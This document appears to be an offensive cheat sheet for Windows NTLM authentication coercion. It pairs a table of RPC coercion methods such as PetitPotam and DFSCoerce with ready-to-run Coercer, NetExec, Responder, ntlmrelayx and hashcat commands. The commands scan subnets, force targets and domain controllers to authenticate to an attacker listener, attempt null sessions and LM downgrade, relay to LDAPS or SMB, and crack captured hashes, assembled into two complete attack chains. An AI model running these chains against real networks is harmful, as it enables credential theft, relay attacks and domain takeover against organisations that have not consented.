Attack Flow
Attacker calls vulnerable RPC function on target (with valid creds)
→ specifies attacker IP as callback address
→ target authenticates outbound to attacker
→ Capture (Responder) or Relay (ntlmrelayx)Requirements
- Valid domain credentials - low privilege sufficient for most methods
- Listener ready before coercion is triggered
Coercion Methods Reference
| Method | Protocol | Notes |
|---|---|---|
| PrinterBug | MS-RPRN | Oldest, frequently patched on DCs |
| PetitPotam | MS-EFSR | Works unauthenticated on unpatched hosts |
| DFSCoerce | MS-DFSNM | Alternative when PrinterBug/PetitPotam patched |
| ShadowCoerce | MS-FSRVP | Targets VSS, less commonly patched |
| MSEven | MS-EVEN | Useful when other methods blocked |
Tools
- Coercer -
pip install coercer, https://github.com/p0dalirius/Coercer - nxc coerce_plus module — preferred, simpler syntax, works with some null sessions
Step 1 - Scan for Vulnerable Methods
coercer scan -t <target-ip> -u <username> -p <password> -d <domain.local>
coercer scan -t <subnet>/24 -u <username> -p <password> -d <domain.local>
coercer scan -t <dc-ip> -u <username> -p <password> -d <domain.local>
nxc smb <target-ip> -u <username> -p <password> -M coerce_plusStep 2 - Set Up Listener First
Option A - Capture (Responder):
sudo responder -I <interface> -dw
# LM downgrade attempt
sudo responder -I <interface> --lmOption B - Relay (ntlmrelayx):
# Relay to LDAP — most impactful when coercing a DC
impacket-ntlmrelayx -t ldaps://<dc-ip> -smb2support --no-dump
# Relay to SMB
impacket-ntlmrelayx -tf targets.txt -smb2supportStep 3 - Trigger Coercion
NetExec (preferred):
nxc smb <target-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>
# Null session attempt
nxc smb <target-ip> -u '' -p '' -M coerce_plus -o LISTENER=<attacker-ip>
# Subnet-wide
nxc smb <subnet>/24 -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>Standalone Coercer:
coercer coerce -l <attacker-ip> -t <target-ip> -u <username> -p <password> -d <domain.local>
coercer coerce -l <attacker-ip> -t <target-ip> -u <username> -p <password> -d <domain.local> -v
coercer coerce -l <attacker-ip> -t <dc-ip> -u <username> -p <password> -d <domain.local> -vFull Attack Chains
Chain 1 - Capture and Crack:
sudo responder -I <interface> -dw
nxc smb <target-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>
hashcat -m 5600 captured_hash.txt <wordlist>Chain 2 - Coerce DC and Relay to LDAP:
impacket-ntlmrelayx -t ldaps://<dc-ip> -smb2support --no-dump
nxc smb <dc-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>Flag Reference
Coercer
| Flag | Meaning |
|---|---|
scan | Test for vulnerable methods without triggering auth |
coerce | Actively trigger authentication |
-t <ip> | Target IP |
-l <ip> | Attacker listener IP |
-u / -p / -d | Credentials and domain |
-v | Verbose — shows which RPC method succeeded |
nxc coerce_plus
| Flag | Meaning |
|---|---|
-M coerce_plus | Load module |
-o LISTENER=<ip> | Attacker IP for target to authenticate toward |